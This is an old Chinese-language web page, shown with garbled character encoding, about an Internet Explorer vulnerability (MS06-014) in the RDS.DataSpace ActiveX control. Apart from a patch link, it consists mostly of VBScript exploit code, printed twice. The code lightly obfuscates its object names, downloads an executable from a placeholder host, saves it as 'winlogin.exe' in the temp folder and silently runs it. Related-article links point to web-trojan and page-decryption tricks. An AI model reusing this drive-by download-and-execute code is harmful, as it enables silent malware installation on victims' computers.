【最新漏洞】IE中使用Rds.DataSpace下載并運(yùn)行病毒文件
更新時(shí)間:2007年02月23日 00:00:00 作者:
請(qǐng)執(zhí)行下面的代碼測(cè)試您的機(jī)器是否存在漏洞:
[Ctrl+A 全選 注:引入外部Js需再刷新一下頁(yè)面才能執(zhí)行]
補(bǔ)丁下載:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相關(guān)病毒的vbs代碼如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
[Ctrl+A 全選 注:引入外部Js需再刷新一下頁(yè)面才能執(zhí)行]
補(bǔ)丁下載:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相關(guān)病毒的vbs代碼如下:
復(fù)制代碼 代碼如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
相關(guān)文章
愛(ài)戀千雪-US-AscII加密解密工具(網(wǎng)頁(yè)加密)下載
愛(ài)戀千雪-US-AscII加密解密工具(網(wǎng)頁(yè)加密)下載...2007-06-06javascript又一解密過(guò)程,推薦的,會(huì)這個(gè)基本上好多都能解決了
javascript又一解密過(guò)程,推薦的,會(huì)這個(gè)基本上好多都能解決了...2007-05-05通過(guò)Unicode轉(zhuǎn)義序列來(lái)加密,按你說(shuō)的可以算是混淆吧
通過(guò)Unicode轉(zhuǎn)義序列來(lái)加密,按你說(shuō)的可以算是混淆吧...2007-05-05JS獲取IUSR_機(jī)器名和IWAM_機(jī)器名帳號(hào)的密碼
JS獲取IUSR_機(jī)器名和IWAM_機(jī)器名帳號(hào)的密碼...2006-12-12一個(gè)網(wǎng)馬的tips實(shí)現(xiàn)分析
把網(wǎng)馬拆分,shellcode代碼存在另一個(gè)地方。好比把一個(gè)網(wǎng)馬的shellcode存在cookie里,別一個(gè)頁(yè)面來(lái)調(diào)用?;蚴谴嬖诹硪粋€(gè)文件里用ajax來(lái)調(diào)用。當(dāng)然想存更多的代碼也可以。2010-11-11用js一招破解所有網(wǎng)頁(yè)的加密源代碼的方法
用js一招破解所有網(wǎng)頁(yè)的加密源代碼的方法...2007-03-03